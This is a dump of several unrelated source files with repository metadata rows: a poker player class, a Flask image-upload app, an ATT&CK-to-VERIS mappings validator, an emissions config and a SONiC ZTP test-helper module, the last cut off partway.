"MIT"
] | 5 | 2021-07-20T07:27:05.000Z | 2022-02-25T07:28:39.000Z | Code/hypers.py | JulySinceAndrew/KIM-SIGIR-2021 | 87b1c21f79a5389cc4a0d122e7ded5f63a63da28 | [
"MIT"
] | null | null | null | MAX_SENTENCE = 30
MAX_ALL = 50
MAX_SENT_LENGTH=MAX_SENTENCE
MAX_SENTS=MAX_ALL
max_entity_num = 10
num = 100
num1 = 200
num2 = 100
npratio=4
| 11.833333 | 28 | 0.774648 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33bf14c77a779be90d64a6d8759da4a08a0088fa | 1,022 | py | Python | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | import os, json
from PIL import Image
import numpy as np
from skimage import io
basePath = './log/log_joku/'
json_files = [pos_json for pos_json in os.listdir(basePath) if pos_json.endswith('.json')]
for file in json_files:
if file != 'meta.json':
#print(file)
with open(basePath + file) as f:
data = json.load(f)
index = data.get('cam/image_array').split('_')[1].split('.')[0]
if (int(index) % 1000) == 0:
print(index)
#print(index)
imgPath = basePath + data.get('cam/image_array')
img = Image.open(imgPath)
imgFlipped = np.fliplr(img)
flippedImgName = 'shotflipped_' + index + '.png'
io.imsave(basePath + flippedImgName, imgFlipped)
data['cam/image_array'] = flippedImgName
data['user/angle'] = data.get('user/angle') * -1
with open(basePath + 'recordflipped_' + index + '.json', 'w') as outfile:
json.dump(data, outfile)
| 37.851852 | 90 | 0.572407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.182975 |
33c1247fa87d16457ea55bc1e3f8ebb9f2eb5bf2 | 21 | py | Python | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 4 | 2020-08-18T09:52:37.000Z | 2021-03-26T19:59:03.000Z | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 4 | 2019-07-06T17:48:46.000Z | 2020-05-11T01:40:18.000Z | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 2 | 2019-02-28T08:02:47.000Z | 2019-07-09T04:23:23.000Z | __all__ = ["orders"]
| 10.5 | 20 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.380952 |
33c380aba8f0a3a85e233adf8c61cab373192d50 | 5,474 | py | Python | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | from gym_holdem.holdem.bet_round import BetRound
from gym_holdem.holdem.poker_rule_violation_exception import PokerRuleViolationException
from pokereval_cactus import Card
class Player:
def __init__(self, stakes, table=None, name=None):
self.table = table
self.name = name
self.bet = 0
self.hand = []
self.stakes = stakes
self._has_called = False
self.hand = None
def reset(self, stakes=0):
self.bet = 0
self.hand = []
self.stakes = stakes
self._has_called = False
self.hand = None
def action_from_amount(self, amount):
self._check_player_may_act()
# CHECK || FOLD
if amount == 0:
if self.to_call_amount() == 0:
self.call_check()
else:
self.fold()
return
# CALL || RAISE
delta = amount - self.to_call_amount()
# IF ALL-IN
if amount == self.stakes:
if delta <= 0:
self.call_check()
else:
self.raise_bet(amount)
else:
if delta == 0:
self.call_check()
elif delta > 0:
self.raise_bet(amount)
else:
raise PokerRuleViolationException(f"Cannot bet less than to call amount: amount=={amount}, to_call=={self.to_call_amount()}")
def call_check(self):
self._check_player_may_act()
amount = self.to_call_amount()
# If player must go All-in to call
if amount > self.stakes:
amount = self.stakes
self._bet(amount)
self._has_called = True
self.table.set_next_player()
def raise_bet(self, amount):
self._check_player_may_act()
delta = amount - self.to_call_amount()
if delta <= 0:
raise PokerRuleViolationException(f"Raise amount is smaller than or equal to to_call amount, consider calling instead: to_call=={self.to_call_amount()}, amount=={amount}")
if amount > self.stakes:
raise PokerRuleViolationException("Cant bet more than he has got")
# NOT ALL IN
if amount < self.stakes:
if delta < self.table.last_bet_raise_delta:
raise PokerRuleViolationException(f"Delta amount of bet/raise must be at least the last delta amount, delta== {delta}, last_delta=={self.table.last_bet_raise_delta}")
self.table.last_bet_raise = delta
# ALL IN --> self.stakes == amount
else:
if delta > self.table.last_bet_raise_delta:
self.table.last_bet_raise_delta = delta
self.table.reset_players_called_var()
self._bet(amount)
self._has_called = True
self.table.set_next_player()
def fold(self):
self._check_player_may_act()
self._has_called = False
del self.table.active_players[self.table.next_player_idx]
# self.table.active_players.remove(self)
self.table.set_next_player(folded=True)
def _bet(self, amount):
if amount > self.stakes:
raise PokerRuleViolationException("Can't bet more than he has got")
if amount < 0:
raise PokerRuleViolationException("Can't bet less than 0")
self.bet += amount
self.stakes -= amount
self.table.bet(amount, self)
@property
def is_all_in(self):
return self.stakes == 0
def bet_small_blind(self):
if self.table.small_blind <= self.stakes:
# print("SB HEY I AM THE TABLE SMALL BLIND")
amount = self.table.small_blind
else:
# print("SB HEY I AM THE STAKES")
amount = self.stakes
# print("sb amount", amount)
self._bet(amount)
def bet_big_blind(self):
if self.table.big_blind <= self.stakes:
# print("BB HEY I AM THE TABLE BIG BLIND")
amount = self.table.big_blind
else:
# print("BB HEY I AM THE STAKES")
amount = self.stakes
# print("bb amount", amount)
self._bet(amount)
@property
def has_called(self):
return self._has_called or self.is_all_in
def to_call_amount(self):
if self.table.current_pot.highest_bet >= self.table.big_blind:
to_call = self.table.current_pot.highest_bet - self.bet
else:
to_call = self.table.big_blind - self.bet
return to_call
def _check_player_may_act(self):
if self.has_called:
raise PokerRuleViolationException("This Player has already called")
if self.table.bet_round == BetRound.SHOWDOWN or self.table.bet_round == BetRound.GAME_OVER:
raise PokerRuleViolationException("Cannot bet, round is over")
if self.table.next_player_idx == -1:
raise PokerRuleViolationException("This betround has already ended")
if self != self.table.next_player:
raise PokerRuleViolationException("It's not this players turn")
def __str__(self):
if self.name:
return f"""Player {self.name}: bet=={self.bet}, \nstakes=={self.stakes},\n hand=={Card.print_pretty_cards(self.hand)}, \n
_has_called=={self._has_called}\n"""
else:
return f"Anonymous Player: bet=={self.bet}\n, stakes=={self.stakes}\n, hand=={Card.print_pretty_cards(self.hand)}\n"
| 33.175758 | 183 | 0.598465 | 5,298 | 0.967848 | 0 | 0 | 151 | 0.027585 | 0 | 0 | 1,212 | 0.22141 |
33c4d9cd799c0848aed6273bf409593aceac5368 | 1,441 | py | Python | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | null | null | null | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | null | null | null | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | 1 | 2022-03-05T20:48:08.000Z | 2022-03-05T20:48:08.000Z | from flask import Flask, request, send_from_directory, redirect, send_file, render_template
import os,cv2
import neuralStyleProcess
app = Flask(__name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
@app.route("/")
def index():
return render_template("upload.html")
@app.route("/upload", methods=['POST'])
def upload():
target = os.path.join(APP_ROOT, 'images/')
print("TARGET", target)
if not os.path.isdir(target):
os.mkdir(target)
else:
print("Couldn't create upload directory: {}".format(target))
data = request.form.get("style")
print(data)
myFiles = []
for file in request.files.getlist("file"):
print("file", file)
filename = file.filename
print("filename", filename)
destination = "".join([target, filename])
print("destination", destination)
file.save(destination)
myFiles.append(filename)
print(myFiles)
return render_template("complete.html", image_names=myFiles, selected_style=data)
# This function takes the parameter name <filename>
@app.route('/upload/<filename>')
def send_original_image(filename):
return send_from_directory("images", filename)
@app.route('/complete/<filename>/<selected_style>')
def send_processed_image(filename, selected_style):
directoryName = os.path.join(APP_ROOT, 'images/')
newImg = neuralStyleProcess.neuralStyleTransfer(directoryName, filename, selected_style)
return send_from_directory("images", newImg)
if __name__ == '__main__':
app.run()
| 30.020833 | 91 | 0.746704 | 0 | 0 | 0 | 0 | 1,130 | 0.784178 | 0 | 0 | 290 | 0.201249 |
33c563ef96dc01994469a37d5d17819ff8a430d8 | 9,678 | py | Python | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 35 | 2021-08-28T05:11:11.000Z | 2022-02-24T05:50:59.000Z | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 1 | 2021-09-16T00:32:19.000Z | 2021-09-16T00:35:59.000Z | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 1 | 2021-12-07T13:10:12.000Z | 2021-12-07T13:10:12.000Z | # Copyright (c) 2021, MITRE Engenuity. Approved for public release.
# See LICENSE for complete terms.
import argparse
import json
import pathlib
import numpy
import requests
from src.create_mappings import get_sheets, get_sheet_by_name
def get_argparse():
desc = "ATT&CK to VERIS Mappings Validator"
argparser = argparse.ArgumentParser(description=desc)
argparser.add_argument(
"-config-location",
dest="config_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "input", "config.json"),
help="The path to the config metadata location.",
)
argparser.add_argument(
"-spreadsheet-location",
dest="spreadsheet_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "veris-mappings.xlsx"),
help="The path to the spreadsheet mappings location.",
)
argparser.add_argument(
"-json-location",
dest="json_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "veris-mappings.json"),
help="The path to the JSON mappings location.",
)
argparser.add_argument(
"-attack-version",
dest="attack_version",
type=str,
default="9.0",
help="The ATT&CK release version to use.",
)
argparser.add_argument(
"-veris-version",
dest="veris_version",
type=str,
default="1.3.5",
help="The VERIS release version to use.",
)
argparser.add_argument(
"-metadata-version",
dest="metadata_version",
type=str,
default="1.9",
help="The Metadata version to check against.",
)
return argparser
def get_mappings_file(mappings_location):
"""Returns the ATT&CK VERIS mappings JSON file"""
path_obj = pathlib.Path(mappings_location).resolve()
with path_obj.open(encoding="utf-8") as f:
return json.load(f)
def get_veris_enum():
"""Downloads the latest VERIS enum"""
veris_enum_dict = requests.get(
"https://raw.githubusercontent.com/vz-risk/VCDB/1.3.5/vcdb-labels.json",
verify=True,
).json()
return veris_enum_dict
def get_stix2_source(attack_version):
"""Downloads ATT&CK knowledge base using the provided version"""
attackid_to_stixid = {}
stix_bundle = requests.get(
f"https://raw.githubusercontent.com/mitre/cti/ATT%26CK-v{attack_version}/"
f"enterprise-attack/enterprise-attack.json",
verify=True,
).json()
for attack_object in stix_bundle["objects"]:
if attack_object["type"] == "attack-pattern":
if "external_references" not in attack_object:
continue # skip objects without IDs
if attack_object.get("revoked", False):
continue # skip revoked objects
if attack_object.get("x_mitre_deprecated", False):
continue # skip deprecated objects
# map attack ID to stix ID
attackid_to_stixid[attack_object["external_references"][0]["external_id"]] = attack_object["id"]
return attackid_to_stixid
def validate_json_mappings_metadata(mappings_location, attack_version, veris_version, metadata_version):
"""Checks for presence and correct metadata information in the mappings JSON file."""
mappings_dict = get_mappings_file(mappings_location)
# Checks presence of metadata key
assert mappings_dict, "[-] No Metadata Found..."
if "metadata" in mappings_dict:
mappings_dict = mappings_dict["metadata"]
# Checks metadata info matches the validator options
assert attack_version == mappings_dict["attack_version"], "[-] ATT&CK Version does not match JSON contents"
assert veris_version == mappings_dict["veris_version"], "[-] VERIS Version does not match JSON contents"
assert metadata_version == mappings_dict["mappings_version"], "[-] Metadata Version does not match JSON contents"
def validate_spreadsheet_mappings_metadata(spreadsheet_location, attack_version, veris_version, metadata_version):
"""Checks for presence and correct metadata information in the mappings spreadsheet."""
sheet_data = get_sheet_by_name(spreadsheet_location, "Metadata")
# Checks presence of metadata key
assert sheet_data.empty is False, "[-] No Metadata Found..."
for idx, row in sheet_data.iterrows():
# Checks metadata info matches the validator options
# Need to track specific rows/cells to make the chec
if idx == 6:
test_attack_version, test_attack_version_value = row[3], row[5]
assert "ATT&CK version" == test_attack_version,\
"[-] Spreadsheet contents does not match ATT&CK version cell"
assert attack_version == str(test_attack_version_value),\
"[-] ATT&CK Version does not match Spreadsheet contents"
if idx == 7:
test_veris_version, test_veris_version_value = row[3], row[5]
assert "VERIS version" == test_veris_version,\
"[-] Spreadsheet contents does not match VERIS version cell"
assert veris_version == str(test_veris_version_value),\
"[-] VERIS Version does not match Spreadsheet contents"
if idx == 8:
test_mappings_version, test_mappings_version_value = row[3], row[5]
assert "Mapping version" == test_mappings_version,\
"[-] Spreadsheet contents does not match Mappings version cell"
assert metadata_version == str(test_mappings_version_value),\
"[-] Mappings version does not match Spreadsheet contents"
if idx == 9:
text_spreadsheet_version, test_spreadsheet_version_value = row[3], row[5]
assert "Spreadsheet version" == text_spreadsheet_version,\
"[-] Spreadsheet contents does not match Spreadsheet version cell"
assert metadata_version == str(test_spreadsheet_version_value),\
"[-] Spreadsheet version does not match Spreadsheet contents "
def validate_mapping_entries(spreadsheet_location, attack_version):
"""Walks over forward and reverse mappings checking the ATT&CK entry is valid.
1) The ATT&CK ID is correct 2) The ATT&CK name is correct 3) The VERIS path is correct"""
attack_source = get_stix2_source(attack_version)
veris_enum = get_veris_enum()
sheets = get_sheets(spreadsheet_location)
print("\t\t[+] VERIS to ATT&CK mappings check...")
fail_test = False
for sheet, name in sheets:
name = name.lower()
print(f"\t\t\t[+] checking sheet: {name}")
veris_path = None
unique_per_veris_entry = {}
for idx, row in sheet.iterrows():
if row[0] is not numpy.nan:
veris_path = f'{name}.{row[0]}'
check_unique = True
else:
check_unique = False
attack_technique = row[1]
if attack_technique is numpy.nan:
# Don't validate the attack_technique if the cell is blank (aka is numpy.nan)
pass
elif attack_technique not in attack_source:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the technique ID '{attack_technique}' is invalid (revoked or deprecated)")
fail_test = True
if check_unique and veris_path in unique_per_veris_entry:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the veris path is duplicated")
fail_test = True
if veris_path not in unique_per_veris_entry:
unique_per_veris_entry[veris_path] = set()
if attack_technique is numpy.nan:
# Don't validate the attack_technique if the cell is blank (aka is numpy.nan)
pass
elif attack_technique not in unique_per_veris_entry[veris_path]:
unique_per_veris_entry[veris_path].add(attack_technique)
else:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the technique ID '{attack_technique}' is duplicated")
fail_test = True
try:
axes, category, sub_category, veris_name = veris_path.split(".")
extracted_value = veris_enum[axes][category][sub_category][veris_name]
assert extracted_value
except (KeyError, ValueError):
print(f"[-] In Sheet '{name}', the VERIS path '{veris_path}' is invalid")
fail_test = True
assert fail_test is False
if __name__ == "__main__":
parser = get_argparse()
args = parser.parse_args()
print("[+] Starting Execution")
print(f"[+] Mappings Location: {args.spreadsheet_location}\t"
f"ATT&CK Version: {args.attack_version}\t"
f"VERIS Version: {args.veris_version}")
validate_json_mappings_metadata(
args.config_location, args.attack_version, args.veris_version, args.metadata_version
)
validate_json_mappings_metadata(
args.json_location, args.attack_version, args.veris_version, args.metadata_version
)
validate_spreadsheet_mappings_metadata(
args.spreadsheet_location, args.attack_version, args.veris_version, args.metadata_version
)
print("\t[+] Metadata Validation passed")
validate_mapping_entries(args.spreadsheet_location, args.attack_version)
print("\t[+] Mappings Validation passed")
print("[+] Finished Execution")
| 39.82716 | 117 | 0.646828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,581 | 0.370014 |
33c5b1377d8bbccb253528d320f78fa3c49f64f2 | 2,015 | py | Python | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | cases/config_d1_tno_art.py | micstein89/cosmo-emission-processing | 7628b6354abb80c7c69b1f13ac3d1757f0455272 | [
"CC-BY-4.0"
] | null | null | null | # "constant" paths and values for TNO, regular lat/lon
# for MeteoTest Swiss inventory, use calculated regular domain in the code
import os
import time
from emiproc.grids import COSMOGrid, TNOGrid
# inventory
inventory = 'TNO'
# model either "cosmo-art" or "cosmo-ghg" (affects the output units)
model = 'cosmo-art'
# input filename
input_path = "/input/TNOMACC/CAMS-REG-AP_v2_2/CAMS-REG-AP_v2_2_1_emissions_year2015.nc"
# input grid
input_grid = TNOGrid(input_path)
# input species
species = ['co', 'nox', 'nmvoc', 'so2', 'nh3', 'pm10', 'pm2_5']
# input categories
categories = ["A", "B", "C", "D", "E", "F1","F2","F3","F4",
"G", "H", "I", "J", "K", "L" ]
# mapping from input to output species (input is used for missing keys)
in2out_species = {
'co': 'CO',
'nox': 'NOX',
'nmvoc': 'NMVOC',
'so2': 'SO2',
'nh3': 'NH3',
'pm10': 'PM10',
'pm2_5': 'PM25'
}
# mapping from input to output categories (input is used for missing keys)
in2out_category = {
'F1': 'F',
'F2': 'F',
'F3': 'F',
'F4': 'F'
}
# output variables are written in the following format using species and
# category after applying the mapping
varname_format = '{species}_{category}_{source_type}'
# output path and filename
output_path = os.path.join('oae-art-example', '{online}', 'tno')
output_name = 'tno-art.nc'
# Output grid is European domain (rotated pole coordinates)
cosmo_grid = COSMOGrid(
nx=192,
ny=164,
dx=0.12,
dy=0.12,
xmin=-16.08,
ymin=-9.54,
pollon=-170.0,
pollat=43.0,
)
# resolution of shapefile used for country mask
shpfile_resolution = "10m"
# number of processes
nprocs = 16
# metadata added as global attributes to netCDF output file
nc_metadata = {
"DESCRIPTION": "Gridded annual emissions",
"DATAORIGIN": "TNO-CAMS",
"CREATOR": "Qing Mu and Gerrit Kuhlmann",
"EMAIL": "gerrit.kuhlmann@empa.ch",
"AFFILIATION": "Empa Duebendorf, Switzerland",
"DATE CREATED": time.ctime(time.time()),
}
| 23.988095 | 87 | 0.649132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,290 | 0.640199 |
33c69f7358ad122b465adeb2350740a2a675b997 | 45,876 | py | Python | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 132 | 2016-10-19T12:34:44.000Z | 2022-03-16T09:00:39.000Z | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 3,152 | 2016-09-21T23:05:58.000Z | 2022-03-31T23:29:08.000Z | spytest/apis/system/ztp.py | shubav/sonic-mgmt | 0ff71b907a55489bb4ed7d17b1682380fd459bf2 | [
"Apache-2.0"
] | 563 | 2016-09-20T01:00:15.000Z | 2022-03-31T22:43:54.000Z | # This file contains the list of API's for operations on ZTP
# @author : Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
from spytest import st
import apis.system.basic as basic_obj
import utilities.utils as utils_obj
import apis.system.switch_configuration as switch_conf_obj
import apis.system.interface as intf_obj
import apis.routing.ip as ip_obj
import apis.system.reboot as reboot_obj
import apis.system.boot_up as boot_up_obj
import datetime
wait_5 = 5
wait_10 = 10
wait_60 = 60
def show_ztp_status(dut, expect_reboot=False, cli_type=""):
"""
Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
API to show ztp status
:param dut:
:return:
"""
cli_type = st.get_ui_type(dut, cli_type=cli_type)
result = dict()
cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
if cli_type not in ["click", "klish"]:
st.error("UNSUPPORTED CLI TYPE")
return result
command = "sudo ztp status" if cli_type == "click" else "show ztp-status"
output = st.show(dut, command, expect_reboot=False, type=cli_type)
file_name = dict()
timestamps = dict()
#excluded_file_name = ["--sonic-mgmt--#"]
if output:
for row in output:
result["filenames"] = list()
result["timestamps"] = list()
if result.get("service"):
pass
else:
result["service"] = row.get("service", "")
# if not result["source"]:
if result.get("source"):
pass
else:
result["source"] = row.get("source", "")
# if not result["status"]:
if result.get("status"):
pass
else:
result["status"] = row.get("status", "")
# if not result["adminmode"]:
if result.get("adminmode"):
pass
else:
result["adminmode"] = row.get("adminmode", "")
# if not result["timestamp"]:
result["timestamp"] = row.get("timestamp", "")
if row.get("filename"):
if cli_type == "click":
values = row["filename"].split(":")
file_name[values[0].strip()] = values[1].strip()
result["filenames"].append(file_name)
elif cli_type == "klish":
file_name[row.get("filename")] = row.get("filestatus")
result["filenames"].append(file_name)
if row.get("filetimestamp"):
timestamps.update({row.get("filename"):row.get("filetimestamp")})
result["timestamps"].append(timestamps)
# if not result["processingtext"]:
# result["processingtext"] = row["processingtext"] if "processingtext" in row and row["processingtext"] else ""
st.debug(result)
return result
def verify_ztp_config_section_from_status(dut, file_names=None, status="SUCCESS", cli_type=""):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to verify that every given config file reports the expected status
    in the parsed "ztp status" output.

    :param dut: device under test
    :param file_names: list of configuration file names to verify
    :param status: expected status string for every file (default "SUCCESS")
    :param cli_type: CLI type to use
    :return: True when every file reports the expected status (or no files
             were given), False on the first mismatch
    """
    # BUGFIX: the docstring was placed after the first statement (a dead string
    # literal) and the default was a mutable list; both corrected here.
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    if not file_names:
        return True
    response = show_ztp_status(dut, cli_type=cli_type)
    for file_name in file_names:
        for names in response["filenames"]:
            # A KeyError here means the file never appeared in the status output.
            if names[file_name] != status:
                return False
    return True
def _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=""):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to verify ZTP status with a bounded number of retries.

    :param dut: device under test
    :param retry_cnt: maximum number of status polls before giving up
    :param cli_type: CLI type to use
    :return: True when ZTP completed successfully, False on failure,
             exhaustion of retries, or when ZTP admin mode is disabled
    """
    # NOTE: the docstring above was previously a dead string statement placed
    # after the first line of code; moved to its proper position.
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    not_started_retry_cnt = 0
    st.log("Verifying the ZTP status with retry method ...")
    for _ in range(1, retry_cnt + 1):
        response = show_ztp_status(dut, cli_type=cli_type)
        if response["adminmode"] == "True":
            st.log("Found that admin mode as {}".format(response["adminmode"]))
            if response["service"] == "Inactive":
                st.log("Found that service as {}".format(response["service"]))
                # Service finished: the final status decides pass/fail.
                if response["status"] == "FAILED":
                    st.log("Found that status as {}".format(response["status"]))
                    return False
                elif response["status"] == "SUCCESS":
                    st.log("Found that status as {}".format(response["status"]))
                    return True
            elif response["service"] == "Processing" or response["service"] == "Active Discovery":
                st.log("Found that service as {}".format(response["service"]))
                if response["status"] == "IN-PROGRESS":
                    st.log("Found that status as {}".format(response["status"]))
                    st.wait(3)
                elif response["status"] == "FAILED":
                    st.log("Found that status as {}".format(response["status"]))
                    return False
                elif response["status"] == "Not Started":
                    st.log("Found that status as {}".format(response["status"]))
                    # Tolerate "Not Started" only up to retry_cnt polls.
                    not_started_retry_cnt += 1
                    if not_started_retry_cnt >= retry_cnt:
                        return False
                    st.wait(3)
                else:
                    return True
            elif response["service"] == "SUCCESS":
                st.log("Found that service as {}".format(response["service"]))
                return True
        else:
            st.log("Found that ZTP is disabled hence enabling it ..")
            return False
    return False
def poll_ztp_status(dut, status=["IN-PROGRESS", "Not Started"], iteration=40, retry=3, cli_type=""):
    """
    API to poll the ztp status
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut:
    :param status: expected status value(s); string or list of strings
    :param iteration: maximum number of polling attempts before giving up
    :param retry: seconds to wait between attempts
    :return: True when the reported status matches, False on timeout
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    expected = [str(entry) for entry in status] if isinstance(status, list) else [status]
    for attempt in range(1, iteration + 2):
        response = show_ztp_status(dut, cli_type=cli_type)
        if response["status"] in expected:
            st.log("Observed {} during polling ...".format(expected))
            return True
        if attempt > iteration:
            break
        st.wait(retry)
    st.log("Max polling interval {} exceeded ...".format(attempt))
    return False
# This function should be called with running ztp run command
def verify_ztp_status(dut, retry_cnt=0, iteration=300, retry=3, expect_reboot=False, reboot_on_success=list(), cli_type=""):
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to verify ZTP status
    :param dut:
    :param retry_cnt:
    :return:
    """
    # With retry_cnt set, delegates to the bounded retry variant; otherwise
    # polls "show ztp status" up to `iteration` times, waiting `retry` seconds
    # between attempts, and decides pass/fail from the service/status fields.
    # reboot_on_success lists plugin file names whose SUCCESS ends the wait
    # early (the device is expected to reboot afterwards).
    retry_count_if_no_response = 0  # tolerate up to 5 empty status outputs
    if retry_cnt:
        return _verify_ztp_status_with_retry(dut, retry_cnt, cli_type=cli_type)
    else:
        st.log("Verifying the ZTP status with iteration method ...")
        for _ in range(1, iteration + 1):
            response = show_ztp_status(dut, expect_reboot=expect_reboot, cli_type=cli_type)
            if not response:
                st.log("Observed no response in ZTP status ... retrying {} .. ".format(retry_count_if_no_response))
                if retry_count_if_no_response > 5:
                    st.error("show ztp status returned empty data...")
                    return False
                st.wait(retry)
                retry_count_if_no_response += 1
                continue
            if "service" not in response or "status" not in response or "adminmode" not in response:
                st.log("Values of service or status or adminmode is not populated yet, retrying ...")
                st.wait(10)
                continue
            if response["adminmode"] == "True":
                # NOTE(review): this repeats the key-presence check performed
                # just above (which already `continue`d); the else branch below
                # is therefore always taken. Harmless but redundant.
                if "service" not in response or "status" not in response or "adminmode" not in response:
                    st.log("Values of service or status or adminmode is not populated yet, retrying ...")
                    st.wait(retry)
                else:
                    # return verify_ztp_status(dut)
                    st.log("Found that admin mode as {}".format(response["adminmode"]))
                    if response["service"] == "Inactive":
                        st.log("Found that service as {}".format(response["service"]))
                        if response["status"] == "FAILED":
                            st.log("Found that status as {}".format(response["status"]))
                            return False
                        elif response["status"] == "SUCCESS":
                            st.log("Found that status as {}".format(response["status"]))
                            return True
                        else:
                            st.log("ZTP status is not in expected values , retrying...")
                            st.wait(retry)
                            # return verify_ztp_status(dut)
                    elif response["service"] == "Processing" or response["service"] == "Active Discovery":
                        st.log("Found that service as {}".format(response["service"]))
                        if response["status"] == "IN-PROGRESS":
                            st.log("Found that status as {}".format(response["status"]))
                            st.log("Files - {}".format(response["filenames"]))
                            # Early exit: if any plugin listed in reboot_on_success
                            # already reports SUCCESS, stop waiting (a reboot follows).
                            if reboot_on_success and "filenames" in response and response["filenames"]:
                                reboot_flag = list(reboot_on_success) if isinstance(reboot_on_success, list) else [reboot_on_success]
                                if len(response["filenames"]) > 0:
                                    filenames = response["filenames"][0]
                                    for filename in reboot_flag:
                                        if filename in filenames and filenames[filename] == "SUCCESS":
                                            return True
                            # klish: config-db / graph-service plugins trigger a config
                            # reload; give the box extra time while they are in progress.
                            if cli_type == "klish":
                                if len(response["filenames"]) > 0:
                                    for key,value in response["filenames"][0].items():
                                        if ("configdb-json" in key or "graphservice" in key) and value == "IN-PROGRESS":
                                            st.wait(300)
                            st.wait(retry)
                            # return verify_ztp_status(dut)
                        elif response["status"] == "FAILED":
                            st.log("Found that status as {}".format(response["status"]))
                            return False
                        elif response["status"] == "Not Started":
                            st.log("Found that status as {}".format(response["status"]))
                            st.wait(retry)
                            # return verify_ztp_status(dut)
                        elif response["status"] == "SUCCESS":
                            st.log("Found that status as {}".format(response["status"]))
                            st.wait(retry)
                            # return verify_ztp_status(dut)
                        else:
                            st.log("ZTP status is not in expected values, retrying...")
                            st.wait(retry)
                    elif response["service"] == "SUCCESS":
                        st.log("Found that service as {}".format(response["service"]))
                        return True
            else:
                # ZTP disabled on the DUT: re-enable and keep polling.
                st.log("Found that ZTP is disabled hence enabling it ..")
                ztp_operations(dut, "enable")
                # ztp_operations(dut, "run")
                # return verify_ztp_status(dut)
        return False
def get_ztp_timestamp_obj(ztp_timestamp):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to get ztp timestamp

    Parses a ZTP timestamp string of the form 'YYYY-MM-DD HH:MM:SS'.

    :param ztp_timestamp: timestamp string, e.g. "2021-01-02 03:04:05"
    :return: datetime.datetime on success; None when the string does not
             match the expected format (the parse error is logged)
    """
    try:
        return datetime.datetime.strptime(ztp_timestamp, '%Y-%m-%d %H:%M:%S')
    except ValueError as e:
        st.error(e)
        # Explicit None (previously implicit) so callers can test the result.
        return None
def enable_ztp_if_disabled(dut, iteration=5, delay=1, cli_type=""):
    """
    API to enable ztp if it is disabled, added check for enable in polling mechanism
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut:
    :param iteration: max polling attempts for each phase
    :param delay: seconds to wait between attempts
    :return: True once admin mode reads back enabled, False on timeout
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    # Phase 1: if the status output reports admin mode disabled, enable ZTP.
